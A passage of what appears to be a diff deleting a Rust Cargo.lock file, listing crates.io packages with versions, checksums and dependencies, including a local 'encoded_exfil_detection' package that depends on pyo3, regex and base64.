"0.22.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6" - -[[package]] -name = "bumpalo" -version = "3.20.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c6f81257d10a0f602a294ae4182251151ff97dbb504ef9afcdda4a64b24d9b4" - -[[package]] -name = "cast" -version = "0.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37b2a672a2cb129a2e41c10b1224bb368f9f37a2b16b612598138befd7b37eb5" - -[[package]] -name = "cc" -version = "1.2.56" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aebf35691d1bfb0ac386a69bac2fde4dd276fb618cf8bf4f5318fe285e821bb2" -dependencies = [ - "find-msvc-tools", - "shlex", -] - -[[package]] -name = "cfg-if" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9330f8b2ff13f34540b44e946ef35111825727b38d33286ef986142615121801" - -[[package]] -name = "chrono" -version = "0.4.43" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fac4744fb15ae8337dc853fee7fb3f4e48c0fbaa23d0afe49c447b4fab126118" -dependencies = [ - "iana-time-zone", - "js-sys", - "num-traits", - "wasm-bindgen", - "windows-link", -] - -[[package]] -name = "ciborium" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42e69ffd6f0917f5c029256a24d0161db17cea3997d185db0d35926308770f0e" -dependencies = [ - "ciborium-io", - "ciborium-ll", - "serde", -] - -[[package]] -name = "ciborium-io" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05afea1e0a06c9be33d539b876f1ce3692f4afea2cb41f740e7743225ed1c757" - -[[package]] -name = "ciborium-ll" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "57663b653d948a338bfb3eeba9bb2fd5fcfaecb9e199e87e1eda4d9e8b240fd9" -dependencies = [ - "ciborium-io", - "half", -] - -[[package]] -name = "clap" -version = "4.5.59" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c5caf74d17c3aec5495110c34cc3f78644bfa89af6c8993ed4de2790e49b6499" -dependencies = [ - "clap_builder", -] - -[[package]] -name = "clap_builder" -version = "4.5.59" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "370daa45065b80218950227371916a1633217ae42b2715b2287b606dcd618e24" -dependencies = [ - "anstyle", - "clap_lex", -] - -[[package]] -name = "clap_lex" -version = "1.0.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3a822ea5bc7590f9d40f1ba12c0dc3c2760f3482c6984db1573ad11031420831" - -[[package]] -name = "core-foundation-sys" -version = "0.8.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "773648b94d0e5d620f64f280777445740e61fe701025087ec8b57f45c791888b" - -[[package]] -name = "criterion" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "950046b2aa2492f9a536f5f4f9a3de7b9e2476e575e05bd6c333371add4d98f3" -dependencies = [ - "alloca", - "anes", - "cast", - "ciborium", - "clap", - "criterion-plot", - "itertools 0.13.0", - "num-traits", - "oorandom", - "page_size", - "plotters", - "rayon", - "regex", - "serde", - "serde_json", - "tinytemplate", - "walkdir", -] - -[[package]] -name = "criterion-plot" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8d80a2f4f5b554395e47b5d8305bc3d27813bacb73493eb1001e8f76dae29ea" -dependencies = [ - "cast", - "itertools 0.13.0", -] - -[[package]] -name = "crossbeam-deque" -version = "0.8.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dd111b7b7f7d55b72c0a6ae361660ee5853c9af73f70c3c2ef6858b950e2e51" -dependencies = [ - "crossbeam-epoch", - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-epoch" -version = "0.9.18" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5b82ac4a3c2ca9c3460964f020e1402edd5753411d7737aa39c3714ad1b5420e" -dependencies = [ - "crossbeam-utils", -] - -[[package]] -name = "crossbeam-utils" -version = "0.8.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d0a5c400df2834b80a4c3327b3aad3a4c4cd4de0629063962b03235697506a28" - -[[package]] -name = "crunchy" -version = "0.2.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "460fbee9c2c2f33933d720630a6a0bac33ba7053db5344fac858d4b8952d77d5" - -[[package]] -name = "deranged" -version = "0.5.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cc3dc5ad92c2e2d1c193bbbbdf2ea477cb81331de4f3103f267ca18368b988c4" -dependencies = [ - "powerfmt", -] - -[[package]] -name = "either" -version = "1.15.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "48c757948c5ede0e46177b7add2e67155f70e33c07fea8284df6576da70b3719" - -[[package]] -name = "encoded_exfil_detection" -version = "1.0.0-RC-1" -dependencies = [ - "base64", - "criterion", - "pyo3", - "pyo3-stub-gen", - "regex", - "serde_json", -] - -[[package]] -name = "equivalent" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "877a4ace8713b0bcf2a4e7eec82529c029f1d0619886d18145fea96c3ffe5c0f" - -[[package]] -name = "find-msvc-tools" -version = "0.1.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5baebc0774151f905a1a2cc41989300b1e6fbb29aff0ceffa1064fdd3088d582" - -[[package]] -name = "getopts" -version = "0.2.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cfe4fbac503b8d1f88e6676011885f34b7174f46e59956bba534ba83abded4df" -dependencies = [ - "unicode-width", -] - -[[package]] -name = "getrandom" -version = "0.2.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0" -dependencies = [ - "cfg-if", - "libc", - "wasi", -] - -[[package]] -name = "half" -version = "2.7.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ea2d84b969582b4b1864a92dc5d27cd2b77b622a8d79306834f1be5ba20d84b" -dependencies = [ - "cfg-if", - "crunchy", - "zerocopy", -] - -[[package]] -name = "hashbrown" -version = "0.16.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100" - -[[package]] -name = "heck" -version = "0.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" - -[[package]] -name = "iana-time-zone" -version = "0.1.65" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e31bc9ad994ba00e440a8aa5c9ef0ec67d5cb5e5cb0cc7f8b744a35b389cc470" -dependencies = [ - "android_system_properties", - "core-foundation-sys", - "iana-time-zone-haiku", - "js-sys", - "log", - "wasm-bindgen", - "windows-core", -] - -[[package]] -name = "iana-time-zone-haiku" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f31827a206f56af32e590ba56d5d2d085f558508192593743f16b2306495269f" -dependencies = [ - "cc", -] - -[[package]] -name = "indexmap" -version = "2.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7714e70437a7dc3ac8eb7e6f8df75fd8eb422675fc7678aff7364301092b1017" -dependencies = [ - "equivalent", - "hashbrown", -] - -[[package]] -name = "inventory" -version = "0.3.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bc61209c082fbeb19919bee74b176221b27223e27b65d781eb91af24eb1fb46e" -dependencies = [ - "rustversion", -] - -[[package]] -name = "is-macro" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1d57a3e447e24c22647738e4607f1df1e0ec6f72e16182c4cd199f647cdfb0e4" -dependencies = [ - "heck", - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "itertools" -version = "0.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b1c173a5686ce8bfa551b3563d0c2170bf24ca44da99c7ca4bfdab5418c3fe57" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186" -dependencies = [ - "either", -] - -[[package]] -name = "itertools" -version = "0.14.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285" -dependencies = [ - "either", -] - -[[package]] -name = "itoa" -version = "1.0.17" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "92ecc6618181def0457392ccd0ee51198e065e016d1d527a7ac1b6dc7c1f09d2" - -[[package]] -name = "js-sys" -version = "0.3.85" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8c942ebf8e95485ca0d52d97da7c5a2c387d0e7f0ba4c35e93bfcaee045955b3" -dependencies = [ - "once_cell", - "wasm-bindgen", -] - -[[package]] -name = "lalrpop-util" -version = "0.20.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "507460a910eb7b32ee961886ff48539633b788a36b65692b95f225b844c82553" - -[[package]] -name = "libc" -version = "0.2.182" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" - -[[package]] -name = "log" -version = "0.4.29" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5e5032e24019045c762d3c0f28f5b6b8bbf38563a65908389bf7978758920897" - -[[package]] -name = "maplit" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e2e65a1a2e43cfcb47a895c4c8b10d1f4a61097f9f254f183aee60cad9c651d" - -[[package]] -name = "matrixmultiply" -version = "0.3.10" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a06de3016e9fae57a36fd14dba131fccf49f74b40b7fbdb472f96e361ec71a08" -dependencies = [ - "autocfg", - "rawpointer", -] - -[[package]] -name = "memchr" -version = "2.8.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8ca58f447f06ed17d5fc4043ce1b10dd205e060fb3ce5b979b8ed8e59ff3f79" - -[[package]] -name = "ndarray" -version = "0.17.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "520080814a7a6b4a6e9070823bb24b4531daac8c4627e08ba5de8c5ef2f2752d" -dependencies = [ - "matrixmultiply", - "num-complex", - "num-integer", - "num-traits", - "portable-atomic", - "portable-atomic-util", - "rawpointer", -] - -[[package]] -name = "num-bigint" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a5e44f723f1133c9deac646763579fdb3ac745e418f2a7af9cd0c431da1f20b9" -dependencies = [ - "num-integer", - "num-traits", -] - -[[package]] -name = "num-complex" -version = "0.4.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "73f88a1307638156682bada9d7604135552957b7818057dcef22705b4d509495" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-conv" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf97ec579c3c42f953ef76dbf8d55ac91fb219dde70e49aa4a6b7d74e9919050" - -[[package]] -name = "num-integer" -version = "0.1.46" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7969661fd2958a5cb096e56c8e1ad0444ac2bbcd0061bd28660485a44879858f" -dependencies = [ - "num-traits", -] - -[[package]] -name = "num-traits" -version = "0.2.19" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "071dfc062690e90b734c0b2273ce72ad0ffa95f0c74596bc250dcfd960262841" -dependencies = [ - "autocfg", -] - -[[package]] -name = "numpy" -version = "0.28.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "778da78c64ddc928ebf5ad9df5edf0789410ff3bdbf3619aed51cd789a6af1e2" -dependencies = [ - "libc", - "ndarray", - "num-complex", - "num-integer", - "num-traits", - "pyo3", - "pyo3-build-config", - "rustc-hash 2.1.1", -] - -[[package]] -name = "once_cell" -version = "1.21.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42f5e15c9953c5e4ccceeb2e7382a716482c34515315f7b03532b8b4e8393d2d" - -[[package]] -name = "oorandom" -version = "11.1.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6790f58c7ff633d8771f42965289203411a5e5c68388703c06e14f24770b41e" - -[[package]] -name = "ordered-float" -version = "5.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f4779c6901a562440c3786d08192c6fbda7c1c2060edd10006b05ee35d10f2d" -dependencies = [ - "num-traits", -] - -[[package]] -name = "page_size" -version = "0.6.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30d5b2194ed13191c1999ae0704b7839fb18384fa22e49b57eeaa97d79ce40da" -dependencies = [ - "libc", - "winapi", -] - -[[package]] -name = "phf" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1fd6780a80ae0c52cc120a26a1a42c1ae51b247a253e4e06113d23d2c2edd078" -dependencies = [ - "phf_shared", -] - -[[package]] -name = "phf_codegen" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aef8048c789fa5e851558d709946d6d79a8ff88c0440c587967f8e94bfb1216a" -dependencies = [ - "phf_generator", - "phf_shared", -] - -[[package]] -name = "phf_generator" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" -dependencies = [ - "phf_shared", - "rand", -] - -[[package]] -name = "phf_shared" -version = "0.11.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67eabc2ef2a60eb7faa00097bd1ffdb5bd28e62bf39990626a582201b7a754e5" -dependencies = [ - "siphasher", -] - -[[package]] -name = "plotters" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5aeb6f403d7a4911efb1e33402027fc44f29b5bf6def3effcc22d7bb75f2b747" -dependencies = [ - "num-traits", - "plotters-backend", - "plotters-svg", - "wasm-bindgen", - "web-sys", -] - -[[package]] -name = "plotters-backend" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df42e13c12958a16b3f7f4386b9ab1f3e7933914ecea48da7139435263a4172a" - -[[package]] -name = "plotters-svg" -version = "0.3.7" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "51bae2ac328883f7acdfea3d66a7c35751187f870bc81f94563733a154d7a670" -dependencies = [ - "plotters-backend", -] - -[[package]] -name = "portable-atomic" -version = "1.13.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c33a9471896f1c69cecef8d20cbe2f7accd12527ce60845ff44c153bb2a21b49" - -[[package]] -name = "portable-atomic-util" -version = "0.2.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7a9db96d7fa8782dd8c15ce32ffe8680bbd1e978a43bf51a34d39483540495f5" -dependencies = [ - "portable-atomic", -] - -[[package]] -name = "powerfmt" -version = "0.2.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "439ee305def115ba05938db6eb1644ff94165c5ab5e9420d1c1bcedbba909391" - -[[package]] -name = "ppv-lite86" -version = "0.2.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "85eae3c4ed2f50dcfe72643da4befc30deadb458a9b590d720cde2f2b1e97da9" -dependencies = [ - "zerocopy", -] - -[[package]] -name = "proc-macro2" -version = "1.0.106" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8fd00f0bb2e90d81d1044c2b32617f68fcb9fa3bb7640c23e9c748e53fb30934" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "pyo3" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf85e27e86080aafd5a22eae58a162e133a589551542b3e5cee4beb27e54f8e1" -dependencies = [ - "libc", - "once_cell", - "portable-atomic", - "pyo3-build-config", - "pyo3-ffi", - "pyo3-macros", -] - -[[package]] -name = "pyo3-build-config" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8bf94ee265674bf76c09fa430b0e99c26e319c945d96ca0d5a8215f31bf81cf7" -dependencies = [ - "target-lexicon", -] - -[[package]] -name = "pyo3-ffi" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "491aa5fc66d8059dd44a75f4580a2962c1862a1c2945359db36f6c2818b748dc" -dependencies = [ - "libc", - "pyo3-build-config", -] - -[[package]] -name = "pyo3-macros" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f5d671734e9d7a43449f8480f8b38115df67bef8d21f76837fa75ee7aaa5e52e" -dependencies = [ - "proc-macro2", - "pyo3-macros-backend", - "quote", - "syn", -] - -[[package]] -name = "pyo3-macros-backend" -version = "0.28.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22faaa1ce6c430a1f71658760497291065e6450d7b5dc2bcf254d49f66ee700a" -dependencies = [ - "heck", - "proc-macro2", - "pyo3-build-config", - "quote", - "syn", -] - -[[package]] -name = "pyo3-stub-gen" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b159f7704044f57d058f528a6f1f22a0a0a327dcb595c5fb38beae658e0338d6" -dependencies = [ - "anyhow", - "chrono", - "either", - "indexmap", - "inventory", - "itertools 0.14.0", - "log", - "maplit", - "num-complex", - "numpy", - "ordered-float", - "pyo3", - "pyo3-stub-gen-derive", - "rustpython-parser", - "serde", - "serde_json", - "time", - "toml", -] - -[[package]] -name = "pyo3-stub-gen-derive" -version = "0.19.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c79e7c5b1fcec7c39ab186594658a971c59911eb6fbab5a5932cf2318534be" -dependencies = [ - "heck", - "indexmap", - "proc-macro2", - "quote", - "rustpython-parser", - "syn", -] - -[[package]] -name = "quote" -version = "1.0.44" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "21b2ebcf727b7760c461f091f9f0f539b77b8e87f2fd88131e7f1b433b3cece4" -dependencies = [ - "proc-macro2", -] - -[[package]] -name = "rand" -version = "0.8.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" -dependencies = [ - "libc", - "rand_chacha", - "rand_core", -] - -[[package]] -name = "rand_chacha" -version = "0.3.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6c10a63a0fa32252be49d21e7709d4d4baf8d231c2dbce1eaa8141b9b127d88" -dependencies = [ - "ppv-lite86", - "rand_core", -] - -[[package]] -name = "rand_core" -version = "0.6.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec0be4795e2f6a28069bec0b5ff3e2ac9bafc99e6a9a7dc3547996c5c816922c" -dependencies = [ - "getrandom", -] - -[[package]] -name = "rawpointer" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "60a357793950651c4ed0f3f52338f53b2f809f32d83a07f72909fa13e4c6c1e3" - -[[package]] -name = "rayon" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "368f01d005bf8fd9b1206fb6fa653e6c4a81ceb1466406b81792d87c5677a58f" -dependencies = [ - "either", - "rayon-core", -] - -[[package]] -name = "rayon-core" -version = "1.13.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "22e18b0f0062d30d4230b2e85ff77fdfe4326feb054b9783a3460d8435c8ab91" -dependencies = [ - "crossbeam-deque", - "crossbeam-utils", -] - -[[package]] -name = "regex" -version = "1.12.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10754a14b9137dd7b1e3e5b0493cc9171fdd105e0ab477f51b72e7f3ac0e276" -dependencies = [ - "aho-corasick", - "memchr", - "regex-automata", - "regex-syntax", -] - -[[package]] -name = "regex-automata" -version = "0.4.14" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6e1dd4122fc1595e8162618945476892eefca7b88c52820e74af6262213cae8f" -dependencies = [ - "aho-corasick", - "memchr", - "regex-syntax", -] - -[[package]] -name = "regex-syntax" -version = "0.8.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a96887878f22d7bad8a3b6dc5b7440e0ada9a245242924394987b21cf2210a4c" - -[[package]] -name = "rustc-hash" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d43f7aa6b08d49f382cde6a7982047c3426db949b1424bc4b7ec9ae12c6ce2" - -[[package]] -name = "rustc-hash" -version = "2.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "357703d41365b4b27c590e3ed91eabb1b663f07c4c084095e60cbed4362dff0d" - -[[package]] -name = "rustpython-ast" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4cdaf8ee5c1473b993b398c174641d3aa9da847af36e8d5eb8291930b72f31a5" -dependencies = [ - "is-macro", - "num-bigint", - "rustpython-parser-core", - "static_assertions", -] - -[[package]] -name = "rustpython-parser" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "868f724daac0caf9bd36d38caf45819905193a901e8f1c983345a68e18fb2abb" -dependencies = [ - "anyhow", - "is-macro", - "itertools 0.11.0", - "lalrpop-util", - "log", - "num-bigint", - "num-traits", - "phf", - "phf_codegen", - "rustc-hash 1.1.0", - "rustpython-ast", - "rustpython-parser-core", - "tiny-keccak", - "unic-emoji-char", - "unic-ucd-ident", - "unicode_names2", -] - -[[package]] -name = "rustpython-parser-core" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4b6c12fa273825edc7bccd9a734f0ad5ba4b8a2f4da5ff7efe946f066d0f4ad" -dependencies = [ - "is-macro", - "memchr", - "rustpython-parser-vendored", -] - -[[package]] -name = "rustpython-parser-vendored" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "04fcea49a4630a3a5d940f4d514dc4f575ed63c14c3e3ed07146634aed7f67a6" -dependencies = [ - "memchr", - "once_cell", -] - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "same-file" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -dependencies = [ - "winapi-util", -] - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "serde_spanned" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f8bbf91e5a4d6315eee45e704372590b30e260ee83af6639d64557f51b067776" -dependencies = [ - "serde_core", -] - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "static_assertions" -version = "1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" - -[[package]] -name = "syn" -version = "2.0.116" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3df424c70518695237746f84cede799c9c58fcb37450d7b23716568cc8bc69cb" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "target-lexicon" -version = "0.13.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb6935a6f5c20170eeceb1a3835a49e12e19d792f6dd344ccc76a985ca5a6ca" - -[[package]] -name = "time" -version = "0.3.47" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "743bd48c283afc0388f9b8827b976905fb217ad9e647fae3a379a9283c4def2c" -dependencies = [ - "deranged", - "num-conv", - "powerfmt", - "serde_core", - "time-core", -] - -[[package]] -name = "time-core" -version = "0.1.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7694e1cfe791f8d31026952abf09c69ca6f6fa4e1a1229e18988f06a04a12dca" - -[[package]] -name = "tiny-keccak" -version = "2.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2c9d3793400a45f954c52e73d068316d76b6f4e36977e3fcebb13a2721e80237" -dependencies = [ - "crunchy", -] - -[[package]] -name = "tinytemplate" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "be4d6b5f19ff7664e8c98d03e2139cb510db9b0a60b55f8e8709b689d939b6bc" -dependencies = [ - "serde", - "serde_json", -] - -[[package]] -name = "toml" -version = "1.0.3+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c7614eaf19ad818347db24addfa201729cf2a9b6fdfd9eb0ab870fcacc606c0c" -dependencies = [ - "indexmap", - "serde_core", - "serde_spanned", - "toml_datetime", - "toml_parser", - "toml_writer", - "winnow", -] - -[[package]] -name = "toml_datetime" -version = "1.0.0+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "32c2555c699578a4f59f0cc68e5116c8d7cabbd45e1409b989d4be085b53f13e" -dependencies = [ - "serde_core", -] - -[[package]] -name = "toml_parser" -version = "1.0.9+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "702d4415e08923e7e1ef96cd5727c0dfed80b4d2fa25db9647fe5eb6f7c5a4c4" -dependencies = [ - "winnow", -] - -[[package]] -name = "toml_writer" -version = "1.0.6+spec-1.1.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ab16f14aed21ee8bfd8ec22513f7287cd4a91aa92e44edfe2c17ddd004e92607" - -[[package]] -name = "unic-char-property" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a8c57a407d9b6fa02b4795eb81c5b6652060a15a7903ea981f3d723e6c0be221" -dependencies = [ - "unic-char-range", -] - -[[package]] -name = "unic-char-range" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0398022d5f700414f6b899e10b8348231abf9173fa93144cbc1a43b9793c1fbc" - -[[package]] -name = "unic-common" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "80d7ff825a6a654ee85a63e80f92f054f904f21e7d12da4e22f9834a4aaa35bc" - -[[package]] -name = "unic-emoji-char" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0b07221e68897210270a38bde4babb655869637af0f69407f96053a34f76494d" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-ident" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e230a37c0381caa9219d67cf063aa3a375ffed5bf541a452db16e744bdab6987" -dependencies = [ - "unic-char-property", - "unic-char-range", - "unic-ucd-version", -] - -[[package]] -name = "unic-ucd-version" -version = "0.9.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96bd2f2237fe450fcd0a1d2f5f4e91711124f7857ba2e964247776ebeeb7b0c4" -dependencies = [ - "unic-common", -] - -[[package]] -name = "unicode-ident" -version = "1.0.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" - -[[package]] -name = "unicode-width" -version = "0.2.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b4ac048d71ede7ee76d585517add45da530660ef4390e49b098733c6e897f254" - -[[package]] -name = "unicode_names2" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d1673eca9782c84de5f81b82e4109dcfb3611c8ba0d52930ec4a9478f547b2dd" -dependencies = [ - "phf", - "unicode_names2_generator", -] - -[[package]] -name = "unicode_names2_generator" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b91e5b84611016120197efd7dc93ef76774f4e084cd73c9fb3ea4a86c570c56e" -dependencies = [ - "getopts", - "log", - "phf_codegen", - "rand", -] - -[[package]] -name = "walkdir" -version = "2.5.0" -source = 